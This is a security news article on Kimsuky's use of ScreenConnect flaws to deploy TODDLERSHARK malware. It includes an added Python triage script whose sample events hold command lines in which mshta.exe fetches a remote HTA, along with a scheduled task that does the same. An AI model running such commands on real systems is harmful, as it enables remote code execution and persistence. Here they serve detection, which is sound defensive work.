Hackers Exploit ConnectWise ScreenConnect Flaws to Deploy TODDLERSHARK Malware


North Korean threat actors have exploited the recently disclosed security flaws in ConnectWise ScreenConnect to deploy a new malware called TODDLERSHARK.

According to a report shared by Kroll with The Hacker News, TODDLERSHARK overlaps with known Kimsuky malware such as BabyShark and ReconShark.

“The threat actor gained access to the victim workstation by exploiting the exposed setup wizard of the ScreenConnect application,” security researchers Keith Wojcieszek, George Glass, and Dave Truman said.

“They then leveraged their now ‘hands on keyboard’ access to use cmd.exe to execute mshta.exe with a URL to the Visual Basic (VB) based malware.”


The ConnectWise flaws in question are CVE-2024-1708 and CVE-2024-1709, which came to light last month and have since come under heavy exploitation by multiple threat actors to deliver cryptocurrency miners, ransomware, remote access trojans, and stealer malware.

Kimsuky, also known as APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), KTA082, Nickel Kimball, and Velvet Chollima, has steadily expanded its malware arsenal to include new tools, the latest being GoBear and Troll Stealer.

BabyShark, first discovered in late 2018, is launched using an HTML Application (HTA) file. Once launched, the VB script malware exfiltrates system information to a command-and-control (C2) server, maintains persistence on the system, and awaits further instruction from the operator.

Then in May 2023, a variant of BabyShark dubbed ReconShark was observed being delivered to specifically targeted individuals through spear-phishing emails. TODDLERSHARK is assessed to be the latest evolution of the same malware due to code and behavioral similarities.

The malware, besides using a scheduled task for persistence, is engineered to capture and exfiltrate sensitive information about the compromised hosts, thereby acting as a valuable reconnaissance tool.

TODDLERSHARK “exhibits elements of polymorphic behavior in the form of changing identity strings in code, changing the position of code via generated junk code, and using uniquely generated C2 URLs, which could make this malware hard to detect in some environments,” the researchers said.
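The launch chain and persistence described above (cmd.exe running mshta.exe with a remote URL, and a scheduled task) are behaviours a defender can key on even when the polymorphic code and per-victim C2 URLs defeat static string signatures. The following is an added example, not code from Kroll or the article: a small Python triage over constructed process-creation records with Sysmon-style fields (the rule names, field names and the documentation-range address 203.0.113.10 are assumptions for illustration).

```python
import ntpath
import re

# Constructed process-creation records (Sysmon Event ID 1 style fields); not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://203.0.113.10/update/index.hta"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\alice\report.hta"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks.exe /create /sc minute /mo 30 /tn Updater '
                '/tr "mshta.exe https://203.0.113.10/r/aBc123"'},
]

# Captures the host part of an http(s) URL anywhere in a command line.
URL_RE = re.compile(r"""https?://([^\s/"']+)""", re.IGNORECASE)


def _basename(path: str) -> str:
    # ntpath handles Windows paths regardless of the platform the script runs on.
    return ntpath.basename(path).lower()


def classify(event: dict):
    """Return (rule_name, url_host) for a suspicious event, or None."""
    image = _basename(event["image"])
    parent = _basename(event["parent"])
    match = URL_RE.search(event["cmdline"])
    if image == "mshta.exe" and match:
        # mshta.exe fetching a remote HTA: the launch pattern Kroll describes.
        # Spawned from cmd.exe it matches the reported chain more closely, so tag it separately.
        rule = "mshta_remote_hta_from_cmd" if parent == "cmd.exe" else "mshta_remote_hta"
        return rule, match.group(1).lower()
    if image == "schtasks.exe" and "/create" in event["cmdline"].lower() and match:
        # A scheduled task whose action reaches out to a URL: persistence of the kind described.
        return "schtasks_create_remote_payload", match.group(1).lower()
    return None


def scan(events):
    """Run classify() over a batch and return one finding per hit, keeping the host for pivoting."""
    findings = []
    for ev in events:
        hit = classify(ev)
        if hit:
            findings.append({"rule": hit[0], "url_host": hit[1], "cmdline": ev["cmdline"]})
    return findings
```

The extracted host is kept alongside each finding so that analysts can pivot to proxy or DNS logs; local HTA launches without a URL are deliberately not flagged.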


The development comes as South Korea’s National Intelligence Service (NIS) accused its northern counterpart of allegedly compromising the servers of two domestic (and unnamed) semiconductor manufacturers and pilfering valuable data.

The digital intrusions took place in December 2023 and February 2024. The threat actors are said to have targeted internet-exposed and vulnerable servers to gain initial access, subsequently leveraging living-off-the-land (LotL) techniques rather than dropping malware in order to better evade detection.

“North Korea may have begun preparations for its own production of semiconductors due to difficulties in procuring semiconductors due to sanctions against North Korea and increased demand due to the development of weapons such as satellite missiles,” NIS said.
